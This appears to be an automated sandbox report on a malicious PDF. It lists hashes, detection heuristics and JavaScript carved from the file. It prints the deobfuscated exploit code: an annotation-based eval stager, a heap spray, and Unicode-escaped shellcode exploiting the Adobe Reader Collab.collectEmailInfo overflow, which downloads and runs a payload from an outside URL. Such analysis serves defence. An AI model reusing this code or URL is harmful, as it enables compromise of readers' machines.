PDF malware analysis — malicious · 5820bac61b5a3f7e

MALICIOUS

PDF

9.1 KB

MD5: 6cfa2a1f3d9673a9deb258f4ae75e418 SHA-1: 237f646509edb0059309dec9dd6396fa49779761 SHA-256: 5820bac61b5a3f7e8320dda1620695700c85c458e6c61145649349a036721028

498 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains JavaScript that leverages CVE-2007-5659 to execute arbitrary code. This script is designed to download and execute a second-stage payload from the URL http://ajxpeehuvpcv.com/nte/TREST1%20.asp/eH08c7740fV0100f060006R771dd27e102T22b62002201l0019K4c4e3212. The use of eval() and unescape() functions, along with the specific exploit cluster, strongly indicates malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 12

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 4 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ClamAV: Pdf.Exploit.Agent-35912 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-35912
Annotation subject percent-decoding eval stager critical PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER

OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes it with unescape(), and dispatches it through eval. This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless getAnnots() itself carries the crafted integer or long argument shape for that vulnerability.
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER

PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (matched in decompressed stream)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://ajxpeehuvpcv.com/nte/TREST1%20.asp/eH08c7740fV0100f060006R771dd27e102T22b62002201l0019K4c4e3212 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `7218a1c68060953321573daa035b16f5f32928ce25a9eb656690dbe78cd9464e`	pdf-javascript-stream	PDF /JS object 7 at offset 0x19B	201 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;
`annotation_subject_callee_hex_stage_000.js` `f6104cd13972dde1a0b9d24c3e50e9167d051bf643361b546906296b7469fbe1`	deobfuscated-js	annotation-subject callee-key decoded JavaScript at offset 0x14A	4990 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var I4MaU_E32kmCC_h = new Array();var LB5Uv_71l = 0;function ib_28C__gH46(C_68__0, c2U__J8__8qb){var b636p_FD8 = c2U__J8__8qb.toString();var Q5l1SQ8sd888fc = "";for(var X6xwH1 = 0; X6xwH1 < b636p_FD8.length; X6xwH1++) {var hnG3_1wpC_a = parseInt(b636p_FD8.substr(X6xwH1, 1));if (!isNaN(hnG3_1wpC_a)) {hnG3_1wpC_a = hnG3_1wpC_a.toString(16);if (hnG3_1wpC_a.length == 1) { hnG3_1wpC_a = "0" + hnG3_1wpC_a; }else if (hnG3_1wpC_a.length != 2) { hnG3_1wpC_a = "00"; }Q5l1SQ8sd888fc = hnG3_1wpC_a + Q5l1SQ8sd888fc;}}while(Q5l1SQ8sd888fc.length < 8) { Q5l1SQ8sd888fc = "0" + Q5l1SQ8sd888fc; }var NbM__cS7 = C_68__0.toString(16);if (NbM__cS7.length == 1) { NbM__cS7 = "0" + NbM__cS7; }else if (NbM__cS7.length != 2) { NbM__cS7 = "00"; }Q5l1SQ8sd888fc = "3" + NbM__cS7 + "P" + Q5l1SQ8sd888fc;return Q5l1SQ8sd888fc;}function S4W_fN__CI0q(b__O3_h1, eeYA3_25j){var m__bJ7kICaL_7 = new Array("");var q_fWN_Q7 = b__O3_h1;var ov4_o___Ll6e7w;if ((ov4_o___Ll6e7w = b__O3_h1.lastIndexOf("%u00")) != -1) {if (ov4_o___Ll6e7w + 6 == b__O3_h1.length) {m__bJ7kICaL_7[0] = b__O3_h1.substr(ov4_o___Ll6e7w + 4, 2);q_fWN_Q7 = b__O3_h1.substring(0, ov4_o___Ll6e7w);}}ov4_o___Ll6e7w = 1;for (X6xwH1 = 0; X6xwH1 < eeYA3_25j.length; X6xwH1++) {var rmB__C206 = eeYA3_25j.charCodeAt(X6xwH1).toString(16);if (rmB__C206.length == 1) { rmB__C206 = "0" + rmB__C206; }m__bJ7kICaL_7[ov4_o___Ll6e7w] = rmB__C206;ov4_o___Ll6e7w++;}X6xwH1 = m__bJ7kICaL_7[0].length ? 0 : 1;m__bJ7kICaL_7[ov4_o___Ll6e7w] = "00";m__bJ7kICaL_7[ov4_o___Ll6e7w + 1] = "00";ov4_o___Ll6e7w += 2;if ((m__bJ7kICaL_7.length - X6xwH1) % 2) {m__bJ7kICaL_7[ov4_o___Ll6e7w] = "00";}while(X6xwH1 < m__bJ7kICaL_7.length) {q_fWN_Q7 += "%u" + m__bJ7kICaL_7[X6xwH1 + 1] + m__bJ7kICaL_7[X6xwH1];X6xwH1 += 2;}q_fWN_Q7 += "%u0000";return q_fWN_Q7;}function LI6H1t(ADM_p____W0xa, uoT__2a_12){while (ADM_p____W0xa.length2<uoT__2a_12) {ADM_p____W0xa += ADM_p____W0xa;}ADM_p____W0xa = ADM_p____W0xa.substring(0,uoT__2a_12/2);return ADM_p____W0xa;}function X3E5__QPPS_4As(N5A1P1___J_3, t4t___7oRo211_d, ra6_db){var P4Sas_Lx_2n = 0x0c0c0c0c;var ADM_p____W0xa = unescape(t4t___7oRo211_d);var eeYA3_25j = ib_28C__gH46(N5A1P1___J_3, ra6_db);var pKkcW_nv = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var b__O3_h1 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6b70%u4461%u0057%u7468%u7074%u2f3a%u612f%u786a%u6570%u6865%u7675%u6370%u2e76%u6f63%u2f6d%u746e%u2f65%u5254%u5345%u3154%u3225%u2e30%u7361%u2f70%u4865%u3830%u3763%u3437%u6630%u3056%u3031%u6630%u3630%u3030%u3630%u3752%u3137%u6464%u3732%u3165%u3230%u3254%u6232%u3236%u3030%u3232%u3130%u306c%u3130%u4b39%u6334%u6534%u3233%u3231";app.eM1b_p = unescape(S4W_fN__CI0q(b__O3_h1, eeYA3_25j));var eQiq5v = 0x400000;var K___kY_l = pKkcW_nv.length 2;var uoT__2a_12 = eQiq5v - (K___kY_l+0x38);ADM_p____W0xa = LI6H1t(ADM_p____W0xa, uoT__2a_12);var N3433__j61w = (P4Sas_Lx_2n - 0x400000)/eQiq5v;for (var wbb_1FQ3T_67Jo = 0; wbb_1FQ3T_67Jo < N3433__j61w; wbb_1FQ3T_67Jo++) {I4MaU_E32kmCC_h[wbb_1FQ3T_67Jo] = ADM_p____W0xa + pKkcW_nv;}}function w3e4DO(){var LX72g_UYMcq = "";for (X6xwH1 = 0; X6 ... (truncated)
`legacy_pdfkit_stage_001.js` `389530a2924c81c091202083b5a4c65042f038ff9234a80c6f76ad08e5b1c3ec`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x2B5	11636 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function YiP_Kdg(o0nNc1, S_DCO0868){var D35qk0O50U6___v = arguments.callee;D35qk0O50U6___v = D35qk0O50U6___v.toString();var US_tF_f_2Sh = 0;try {if (app) {US_tF_f_2Sh = 2;}} catch(e) { }var HD_FuLj_3 = new Array();if (!o0nNc1) { var x_s_P2_6v = 0;var c_567W_8 = 0;while(c_567W_8 < D35qk0O50U6___v.length) {var kYR1ep_y = 0;var Dy_8P6Tg_2 = D35qk0O50U6___v.charCodeAt(c_567W_8);if (Dy_8P6Tg_2 >= 48 && Dy_8P6Tg_2 <= 57) { kYR1ep_y = 1; }if (kYR1ep_y) {if (x_s_P2_6v == 4) { x_s_P2_6v = 0; }if (isNaN(HD_FuLj_3[x_s_P2_6v])) { HD_FuLj_3[x_s_P2_6v] = 0; }HD_FuLj_3[x_s_P2_6v] += Dy_8P6Tg_2;if (HD_FuLj_3[x_s_P2_6v] > 512) {HD_FuLj_3[x_s_P2_6v] -= 512;}x_s_P2_6v++;}c_567W_8++;}} else {HD_FuLj_3 = o0nNc1;}for(x_s_P2_6v = 4; x_s_P2_6v > 0; x_s_P2_6v--) {if (HD_FuLj_3[x_s_P2_6v - 1] > 256) {HD_FuLj_3[x_s_P2_6v - 1] -= 256;}}var TedS75E6 = 0;var ibB245cf5_d = "";var itV_Dy = 0;var U73rKAeQ238s = 0;var pX_ar5oE = 0;var TYJq_3t;var t_5b_83Yp = 0;while(U73rKAeQ238s < S_DCO0868.length) {var B__23s = S_DCO0868.substr(U73rKAeQ238s, 1);var qBci__7o7Ne = parseInt(B__23s, 16);if (pX_ar5oE) {TYJq_3t += qBci__7o7Ne;if (TedS75E6 == 4) {TedS75E6 -= 4;}var r_j3g_5 = TYJq_3t;r_j3g_5 = r_j3g_5 - (t_5b_83Yp + 2) * HD_FuLj_3[TedS75E6];if (r_j3g_5 < 0) {var jQF2683pDr = Math.floor(r_j3g_5 / 256);r_j3g_5 = r_j3g_5 - jQF2683pDr * 256;}r_j3g_5 = String.fromCharCode(r_j3g_5);if (US_tF_f_2Sh == 1) {ibB245cf5_d += qBci__7o7Ne;} else if (US_tF_f_2Sh == 2) {ibB245cf5_d += r_j3g_5;} else {ibB245cf5_d += U73rKAeQ238s;}TedS75E6++;t_5b_83Yp++;pX_ar5oE = 0;} else {TYJq_3t = qBci__7o7Ne * 16;pX_ar5oE = 1;}U73rKAeQ238s++;}eval(ibB245cf5_d);return 0;} YiP_Kdg(0, "34254A2B83A8FDA80B83CDB6643FCD02F1E3A01B67547E9C1D0429E594F539D7C77F0E4C8C14BC69CBF9BEC249858CBFCB24281670293E7AFACD17C1227DE2EEB0FC9B2A59DB783BAC4C4BA2280C3FDE9EB0D81E1C89EF56B01CC7921A05A298D9BA791DFA56261A8C142769168CC09C6E67AAF029139A0FA5C36084244274BE91384AF428DBD8F0719AE975D22595AB5FD789B31D9848EF5E4A4B13DFB4E25159AA07DDC26AD11936FC7E5B099C513F4B242896AA0C060F7DACD9F3BE34E24531FAC8AAC0B868B56289762AE63C1B1F46BA30B2B265BBA20F04E329C30660574C8B4B8A8B6B60AA3505E8E072C401514169C189BEDCB28DF99A98F2885838FD31393A7EAEE6D89FEC9CFFCB630080F0D7AD7364905438580F5736D470BC281DE577F71C9164B386F7CD71838DBC8EE6C16329527AF72F78A6A1C8BB705BB3EEAF3BC80E59D55E7BE5777CB55B4247A79FBAE1F6539AB01FCE52AF6641C5B7DFA1A379D946595E4ECA0CE8600F74D1886E7F980338FB833677DB98562175208C5EE608ADDA9FD02FA46BBB62E34BD0828DE5739B27997C2A8B045159C2BC289D6577F79C1164B30677D2B44800BB94872E25357BBCDDF01226CC161AB573B1866E07B7AC9AB150A926542AFE925131345AB50B8CA2A7F4AF1E1CCE1682D160574C8B4B8A8B6B60AA3505E8CE72A5D54BFF57C953BD18888FFECA8BCEBF91773727303D338BA91C780975C0F6960C98F714E766678FA277AB0E0424935ABDE02ABE95CD574B47C15F0908809B4ABA83BFCB241A0B2CD4FB37D79914845565B802E2FC900360D76B27F39A69B5122242CCCDE31B0E2154CD17A9439E6B41F3709DD2B36B1F4C5D5E4E7ED5FE4C0DBD067F7652DAE82913B32A7D929478307B74B75E0115ABEB9DD0425672EA501133C39265A4759BCC6432D751043655EFF31F92717BD38B1759DC1A7BC4B149B27C6E815B6357BEDDEBFE036BD20F47EA34A14C1EF6816BF5947EE943836726C50B003C0EA6E86B8C6FB0F43719D4E4B5E57862427C5063C05710A4F6C6FBC5727FC02D3051D77AAD078777F1844AE364342BEF0FF9443C8DC5E8BA1A5CC0BB98379B3113F8AD6D9854616C12153BC45A0724E7D67CFE4E5571D69C0407BCCC81C240F2C25B574158132F5ACF94197B6473DFDEB123C0FC2694956CCF653BA224094AA8E9FA192D0AA1EF56C82E9F9E2BD7A1BBBD7B38E8FA62555E76E53A9533CDC881702DB3112B267048A5CA7F612165376F7BE43AEA19C3E3269E55C379134680AEA4B897EA09936F03921A4D2A19CF29953E6CC0DA1028CF167503A72FFE8A85568524357BEC132FE639C31004B080E182720DC6AFDFEC7FED1E462D38A204022817A4D9788A61C1A0065FD11982BCAF6512A3878AB9533CD30C09FF1A727FC015EE41B53BAC13AFA6F9C390C47080653D253840345AEF1DA61586D2BA9D1DA320FAE36F565A913074C64647D271C71F17CF720B607C67E499BE13BE9771C37FFEED5064116FEB4737B184DC7F2246A9CAEF23BE2248D3813E966128A551332FB2CDECE9E95DA9F26ADA56D1A149BC709B7EB38EDF39634F46B5F03459378B17888981F50A40E8AF46A5C3875F2E4A6586B5E415ABEBAF1636A844B05BE84CD7875FA4759BDA6F300F5C5C5F3BD3B4FC4F83A9F1ACCD53A2DC80D2B44800BB948749245091022B18C8318FD1F3FD8AE1811E36C58DD9D373B9265A28 ... (truncated)
`deobfuscated.js` `e4fe998eefc832e880db00aae1b3eda877c3d2fee89b4da3a345e7145babb10e`	deobfuscated-js	PDF JavaScript deobfuscation pass	42058 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1; z0dz0az0dz0az09z66z75z6ez63z74z69z6fz6ez20z59z69z50z5fz4bz64z67z28z6fz30z6ez4ez63z31z2cz20z53z5fz44z43z4fz30z38z36z38z29z7bz76z61z72z20z44z33z35z71z6bz30z4fz35z30z55z36z5fz5fz5fz76z20z3dz20z61z72z67z75z6dz65z6ez74z73z2ez63z61z6cz6cz65z65z3bz44z33z35z71z6bz30z4fz35z30z55z36z5fz5fz5fz76z20z3dz20z44z33z35z71z6bz30z4fz35z30z55z36z5fz5fz5fz76z2ez74z6fz53z74z72z69z6ez67z28z29z3bz76z61z72z20z55z53z5fz74z46z5fz66z5fz32z53z68z20z3dz20z30z3bz74z72z79z20z7bz69z66z20z28z61z70z70z29z20z7bz55z53z5fz74z46z5fz66z5fz32z53z68z20z3dz20z32z3bz7dz7dz20z63z61z74z63z68z28z65z29z20z7bz20z7dz76z61z72z20z48z44z5fz46z75z4cz6az5fz33z20z3dz20z6ez65z77z20z41z72z72z61z79z28z29z3bz69z66z20z28z21z6fz30z6ez4ez63z31z29z20z7bz20z76z61z72z20z78z5fz73z5fz50z32z5fz36z76z20z3dz20z30z3bz76z61z72z20z63z5fz35z36z37z57z5fz38z20z3dz20z30z3bz77z68z69z6cz65z28z63z5fz35z36z37z57z5fz38z20z3cz20z44z33z35z71z6bz30z4fz35z30z55z36z5fz5fz5fz76z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z6bz59z52z31z65z70z5fz79z20z3dz20z30z3bz76z61z72z20z44z79z5fz38z50z36z54z67z5fz32z20z3dz20z44z33z35z71z6bz30z4fz35z30z55z36z5fz5fz5fz76z2ez63z68z61z72z43z6fz64z65z41z74z28z63z5fz35z36z37z57z5fz38z29z3bz69z66z20z28z44z79z5fz38z50z36z54z67z5fz32z20z3ez3dz20z34z38z20z26z26z20z44z79z5fz38z50z36z54z67z5fz32z20z3cz3dz20z35z37z29z20z7bz20z6bz59z52z31z65z70z5fz79z20z3dz20z31z3bz20z7dz69z66z20z28z6bz59z52z31z65z70z5fz79z29z20z7bz69z66z20z28z78z5fz73z5fz50z32z5fz36z76z20z3dz3dz20z34z29z20z7bz20z78z5fz73z5fz50z32z5fz36z76z20z3dz20z30z3bz20z7dz69z66z20z28z69z73z4ez61z4ez28z48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z5dz29z29z20z7bz20z48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z5dz20z3dz20z30z3bz20z7dz48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z5dz20z2bz3dz20z44z79z5fz38z50z36z54z67z5fz32z3bz69z66z20z28z48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z5dz20z3ez20z35z31z32z29z20z7bz48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z5dz20z2dz3dz20z35z31z32z3bz7dz78z5fz73z5fz50z32z5fz36z76z2bz2bz3bz7dz63z5fz35z36z37z57z5fz38z2bz2bz3bz7dz7dz20z65z6cz73z65z20z7bz48z44z5fz46z75z4cz6az5fz33z20z3dz20z6fz30z6ez4ez63z31z3bz7dz66z6fz72z28z78z5fz73z5fz50z32z5fz36z76z20z3dz20z34z3bz20z78z5fz73z5fz50z32z5fz36z76z20z3ez20z30z3bz20z78z5fz73z5fz50z32z5fz36z76z2dz2dz29z20z7bz69z66z20z28z48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z20z2dz20z31z5dz20z3ez20z32z35z36z29z20z7bz48z44z5fz46z75z4cz6az5fz33z5bz78z5fz73z5fz50z32z5fz36z76z20z2dz20z31z5dz20z2dz3dz20z32z35z36z3bz7dz7dz76z61z72z20z54z65z64z53z37z35z45z36z20z3dz20z30z3bz76z61z72z20z69z62z42z32z34z35z63z66z35z5fz64z20z3dz20z22z22z3bz76z61z72z20z69z74z56z5fz44z79z20z3dz20z30z3bz76z61z72z20z55z37z33z72z4bz41z65z51z32z33z38z73z20z3dz20z30z3bz76z61z72z20z70z58z5fz61z72z35z6fz45z20z3dz20z30z3bz76z61z72z20z54z59z4az71z5fz33z74z3bz76z61z72z20z74z5fz35z62z5fz38z33z59z70z20z3dz20z30z3bz77z68z69z6cz65z28z55z37z33z72z4bz41z65z51z32z33z38z73z20z3cz20z53z5fz44z43z4fz30z38z36z38z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z42z5fz5fz32z33z73z20z3dz20z53z5fz44z43z4fz30z38z36z38z2ez73z75z62z73z74z72z28z55z37z33z72z4bz41z65z51z32z33z38z73z2cz20z31z29z3bz76z61z72z20z71z42z63z69z5fz5fz37z6fz37z4ez65z20z3dz20z70z61z72z73z65z49z6ez74z28z42z5fz5fz32z33z73z2cz20z31z36z29z3bz69z66z20z28z70z58z5fz61z72z35z6fz45z29z20z7bz54z59z4az71z5fz33z74z20z2bz3dz20z71z42z63z69z5fz5fz37z6fz37z4ez65z3bz69z66z20z28z54z65z64z53z37z35z45z36z20z3dz3dz20z34z29z20z7bz54z65z64z53z37z35z45z36z20z2dz3dz20z34z3bz7dz76z61z72z20z72z5fz6az33z67z5fz35z20z3dz20z54z59z4az71z5fz33z74z3bz72z5fz6az33z67z5fz35z20z3dz20z72z5fz6az33z67z5fz35z20z2dz20z28z74z5fz35z62z5fz38z33z59z70z20z2bz20z32z29z20z2az20z48z44z5fz46z75z4cz6az5fz33z5bz54z65z64z53z37z35z45z36z5dz3bz69z66z20z28z72z5fz6az33z67z5fz35z20z3cz20z30z29z20z7bz76z61z72z20z6az51z46z32z36z38z33z70z44z72z20z3dz20z4dz61z74z68z2ez66z6cz6fz6fz72z28z72z5fz6az33z67z5fz35z20z2fz20z32z35z36z29z3bz72z5fz6az33z67z5fz35z20z3dz20z72z5f ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.